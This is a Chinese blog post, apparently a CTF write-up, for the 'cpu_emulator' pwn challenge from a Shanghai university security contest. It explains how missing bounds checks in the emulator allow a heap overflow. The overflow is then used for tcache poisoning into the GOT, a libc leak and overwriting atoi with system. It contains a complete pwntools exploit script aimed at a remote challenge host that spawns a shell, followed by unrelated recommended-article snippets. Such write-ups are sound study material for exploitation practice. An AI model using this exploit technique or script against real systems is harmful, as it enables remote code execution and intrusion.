上海大学生网络安全赛cpu_emulator

最新推荐文章于 2024-08-21 08:47:15 发布
最新推荐文章于 2024-08-21 08:47:15 发布
阅读量362 收藏
点赞数 1
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chennbnbnb/article/details/109703160
版权
该博客详细介绍了如何通过程序分析发现堆溢出漏洞,利用该漏洞操纵GOT表,最终实现getshell。首先构造堆溢出条件,接着泄露libc地址,再修改GOT表中的函数指针,最后通过system调用获取shell。整个过程涉及堆管理、内存布局和 libc 漏洞利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

程序分析

  • 指令是4B一组,共32位,第一种指令格式为|6|5|5|16|,代表指令类型、Ope1、Ope2、Ope3

先不关注第二种指令类型

根据BrainFuck的经验,考虑这里有没有Stack/Buffer的溢出,Stack在bss上,溢出只能打到stdou指针,很少是这种。Buffer在堆上,堆溢出较为常见,并且是2.27的libc。因此本题思路位:通过指令的不合法操作数,造成堆溢出来getshell

 

思路

先考虑咋构造处一个堆溢出,考虑指令0x2B,只要让stack[Ope1]+Ope3大于申请的堆长度即可,]

Buffer为0x10000

Ope3有16bit,最大为0xFFFF,只要Stack[Ope1]大于1就有一个堆溢出

 

因为got保护不全,所以直接劫持到got表

 

还有个问题,题目只能先free再malloc,对于T->A->B的情况,会永远也申请不到B

这里有两个解决方法:

  • 再次利用堆溢出,修改A的size
  • 直接利用partial overwite打Tcache结构体

由于先free在malloc的限制,无法构造出堆上T->A->B的情况,所以只能修改size来大got表

 

下面考虑怎么泄露地址

如果打free@got会造成puts@got为空

 

Tcache分配到got表前面即可

 

EXP

#! /usr/bin/python
from pwn import *
context.log_level = 'debug'
context(arch='amd64', os='linux')

#sh = process('./emulator')
elf = ELF('./emulator')
libc = ELF('./libc.so.6')

sh = remote('123.56.52.128', 18236)
#proc_base = sh.libs()[sh.cwd + sh.argv[0].strip('.')]

def Log(val):
	log.success('%s = %s'%(str(val), hex(eval(val))))

#|6|5|5|16|
def MakeIns(cmd1, ope1, ope2, ope3):
	return p32((ope3)|(ope2<<16)|(ope1<<21)|(cmd1<<26))

def Cmd(i):
	sh.sendlineafter('>> ', str(i))

def Input(L, ins):
	Cmd(1)
	sh.sendlineafter('instruction size:\n', str(L))
	sh.recvuntil('instruction:\n')
	sh.send(ins)

def Run():
	Cmd(2)		

def WriteByte(pos, val):
	ins = MakeIns(0x8, 0, 1, pos+1)	#Stack[1] = Stack[0] + pos = pos
	ins+= MakeIns(0x8, 2, 3, val)	#Stack[3] = Stack[2] + val = val
	ins+= MakeIns(0x2B, 1, 3, 0xFFFF)
	return ins

Input(0x50, 'A'*0x50)				#Tcahce->A
Input(0x60, 'C'*0x60)

ins = WriteByte(16, 0x10)			#Tcache->A->free@GOT-8	
ins+= WriteByte(17, 0x20)
ins+= WriteByte(18, 0x60)
Input(len(ins), ins)
Run()

ins = WriteByte(8, 0x51)			#foirge chunk1's size
Input(0x50, ins.ljust(0x50, '\x00'))#Tcache->free@GOT-8
Run()				

Input(0x50, p64(elf.plt['puts'])*2)#free@GOT=puts@PLT

ins = WriteByte(16, 0x58)			#Tcahce->0x50->atoi@GOT
ins+= WriteByte(17, 0x20)
ins+= WriteByte(18, 0x60)
Input(len(ins), ins)
Run()
			
Input(0x40, 'B'*0x40)
Input(0x40, p8(0xa0))

Cmd(1)
libc.address = u64(sh.recv(6).ljust(8, '\x00')) - libc.symbols['atoi']
Log('libc.address')

sh.sendlineafter('instruction size:\n', str(0x30))
sh.recvuntil('instruction:\n')
sh.send('B'*0x30)

ins = WriteByte(0x60+16, 0x58)			#Tcahce->0x70->atoi@GOT
ins+= WriteByte(0x60+17, 0x20)
ins+= WriteByte(0x60+18, 0x60)
Input(len(ins), ins)
Run()

Input(0x60, 'C'*0x60)
Input(0x60, p64(libc.symbols['system']))

sh.recvuntil('>> ')
sh.send('/bin/sh\x00')

#gdb.attach(sh, 'break *0x4011EC')



sh.interactive()

'''
Run High6bit!=0 0x400E9F
ReadIns			0x400A40
switch jmp		0x400ECB
malloc			0x4011EC

Stack			0x6020E0
Buffer			
'''

总结

利用模拟器的边界未检查得到一个堆溢出,然后利用Tcache打GOT表

但这里的malloc最后会有一个mov [rdx+0x8], 0;指令,导致直接覆盖free时会让puts为0,可以通过分配到free@GOT-0x8解决

劫持free为puts之后再次劫持Tcache分配chunk到GOT表,这样在free时就可以泄露libc地址

然后再次劫持Tcache分配chunk到GOT表,修改atoi为system从而getshell

云计算技术 — 云计算技术发展编年史
烟云的计算
10-31 1万+
目录 文章目录目录虚拟化的发展进程硬件仿真虚拟化完全虚拟化半虚拟化操作系统虚拟化 虚拟化的发展进程 1959 年,克里斯托弗(Christopher Strachey)在国际信息处理大会(International Conference on Information Processing)上发表了一篇名为《大型高速计算机中的时间共享》(Time Sharing in Large Fast Comp...
Arch Linux&Linux引导教程 2021.7.22
stvsl的博客
07-19 4830
Arch Linux配置&Linux使用教程 文章目录Arch Linux配置&Linux使用教程1.简介2.安装前的准备——镜像烧录2.1 原Windows用户2.2 原Linux用户2.3 使用ventory实现烧录3.进入安装环境前的准备3.1 原windows用户3.2 原Linux用户3.3 不管你是什么用户4.开始安装过程4.1 确认当前的引导模式为UEFI4.2 连接网络4.3 确认网络连接状态4.4 禁用reflector4.5 进行时间同步4.6 更换国内镜像源4.7 分区
cpu-emulator
07-22
模拟CPU的软件说明,该软件是一本书上的附加软件
cpu-emulator:在Ruby中模拟8位CPU
02-05
在Ruby中模拟8位计算机设计 最初是一台4位计算机,但随着我想做更多事情而发展。 这里的原始想法: CPU使用带有条件跳转和子例程规定的最小指令集。 每个操作码为4位,指令长度为8位或16位。 原理图 使用说明 单字节指令 +-------------------+ | o o o o | d d d d | +-------------------+ +-------------------+ | op-code | ignored | RET ignores data. +-------------------+ +-------------------+ | op-code |
0x110-从头开始写操作系统-CPU模拟器
0pr
05-31 1462
16-bit real mode, 也称为 16-bit real address mode。是所有 x86 CPU 一种运行模式(另一种常见的是 32-bit Protected Mode)。为了向前兼容,所有 x86 CPU 启动时,都处在 16-bit real mode。16 bit real mode 下,内存管理采用内存分段的方式。16 bit real mode 下,内存没有保护机制,所有程序可以随意访问任意段内存的内容。我发现有些东西不能精简,这是实践过程中必须弄懂的一些东西。......
一个小型RISCV CPU Emulator设计与实现
tugouxp的专栏
11-04 328
直接执行make即可编译。
思科网络设备和安全设备模拟器gns3+防火墙pix721.bin镜像
08-19
gns3模拟器可以模拟思科的网络设备和安全设备,pix为思科的防火墙,模拟需要提供一个pix镜像,该镜像就可以满足这样的需求
项目一:认识linux操作系统
nillto的博客
03-19 535
任务一:查找Linux系统的基本概括;Linux[2]操作系统是UNIX操作系统的一种克隆系统,它诞生linux系统于1991 年的10 月5 日(这是第一次正式向外公布的时间)。以后借助于Internet网络,并通过全世界各地计算机爱好者的共同努力,已成为今天世界上使用最多的一种UNIX 类操作系统,并且使用人数还在迅猛增长。Linux是一套免费使用和自由传播的类Unix操作系统,是一个基于PO...
我的初学笔记
XinJiang_Terrorist的博客
05-02 6444
导览 1.Android UI a)Layout (CommonLayout,Adapter Layout) b)InputControls(Buttons,TextFileds,Bars) c)InputEvents(onClick,onKey,onTouch,onChecked) d)UI Components(Menu,ActionBar,Dialog,Notification,T
IT英语4-计算机英语缩写术语
weixin_30394633的博客
04-20 8192
IT英语4-计算机英语缩写术语 1、CPU3DNow!(3D no waiting,无须等待的3D处理)AAM(AMD Analyst Meeting,AMD分析家会议)ABP(Advanced Branch Prediction,高级分支预测)ACG(Aggressive Clock Gating,主动时钟选择)AIS(Alternate Instruction Set,交...
探索复古编程的魅力:8086 Emulator深度体验
最新发布
gitblog_00186的博客
08-21 680
探索复古编程的魅力:8086 Emulator深度体验 8086-emulatorAn Intel 8086 CPU emulator in Python with GUI.项目地址:https://gitcode.com/gh_mirrors/808/8086-emulator 在这个快速迭代的软件开发时代,怀旧之情往往会引导我们追溯计算机科学的根源。今天,我们将一起探索一个让人眼前一亮的开源...
网络安全模拟网站,黑客模拟网站,分享几个玩玩~
热门推荐
残阳曦月
07-26 4万+
最近看了《亲爱的,热爱的》电视剧,一开始是这些网络大镜头吸引了我,后面渐渐的陷入了韩商言和年年的甜蜜中。。。据说原著是电竞游戏,电视剧改编成网络安全了,可能是想更多的网友认识下网络安全,也是韩商言一直坚持的中国梦!所谓CTF网站安全大,这是官网<https://ctf.360.com/><简介:WCTF 世界黑客大师始办于2016年,立足于高水平的网络安全技术对抗...
芯片设计验证 之 常用Emulator简介
EricWZY2008的专栏
08-04 7964
如题。
VM技术(二)从CHIP8入手CPU的模拟(一)
07-31 299
CHIP8的话网上已经有许多的模拟器的解说了,这里我们就给出CPU的模拟过程 CHIP8代码 CHIP8 CPU https://gitee.com/Luciferearth/EasyVGM/blob/master/modules/CHIP8/ 显示器 https://gitee.com/Lu...
构建一个CPU模拟器
m0_43422086的博客
07-12 2606
CPU模拟器
计算机原理:简单CPU模拟器的设计与实现
菜鸟程序员的自我修养
07-20 1万+
/* 计算机课程设计实验报告 跳转指令用栈实现 */ 一、设计内容 简单CPU模拟器的设计与实现   二、设计要求 计算机组成原理这门课程主要是告诉我们在硬件上计算机是如何工作的,如何实现我们的操作的,即让我们了解计算机的基本组成结构以及数据和命令在计算机的物理层面上如何运行的。在学习完这门课程后,我们应该能够运用该课程的基本原理和基本方法,对有关计算机硬件系统中的理论和实际问题进...
基于C#实现的进制计算器
qq_38474871的博客
07-14 946
一、实验背景该实验为计算机原理模拟实验平台。在学习计算机原理实验课程中,为了方便同学们学习了解模型机中各种寄存器结构、工作原理、算术、逻辑运算单元及其控制方法。所以我们设计计算机组成原理虚拟实验系统方便同学们更加深入的了解实验内容,掌握计算机通过指令系统进行运算的过程。程序编写语言:c# 平台环境:VisualStudio2017 操作系统要求:Windo...
仿真器(emulator)和模拟器(simulator)的区别
顺其自然~专栏
03-18 1万+
仿真器(emulator)和模拟器(simulator)是比较容易混淆的概念,这两个概念不仅针对计算机体系结构,在很多方面都有所应用,例如航空模拟器、街机仿真器等。 模拟器(simulator)是用于分析研究目标系统本身,模拟器系统本身要跟目标系统保持一致。例如飞行模拟器对于用户来讲其本身要跟真正的飞机一致;再比如gem5模拟器,其本身要跟CPU所有内部行为一致(包括内部运行原理都要一致)。好的模拟器本身也可以仿真其目标系统,但不是所有模拟器都有这个特性。 仿真器(emulator)的目的是作为目标系统
CTF pwn -- ARM架构的pwn题详解
lifanxin的博客
05-14 3202
arm架构的pwn题详解概述环境搭建使用QEMU使用gdb-multiarchARM架构基本知识一道例题参考博客总结 概述   ARM架构过去称作进阶精简指令集机器(Advanced RISC Machine,更早称作:Acorn RISC Machine),是一个32位精简指令集(RISC)处理器架构,其广泛地使用在许多嵌入式系统设计。由于节能的特点,ARM处理器非常适用于移动通讯领域,符合其主要设计目标为低耗电的特性。因此我们常用的手机、平板等移动设备都是采用ARM体系架构的,因此CTF中不可避免也会出
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值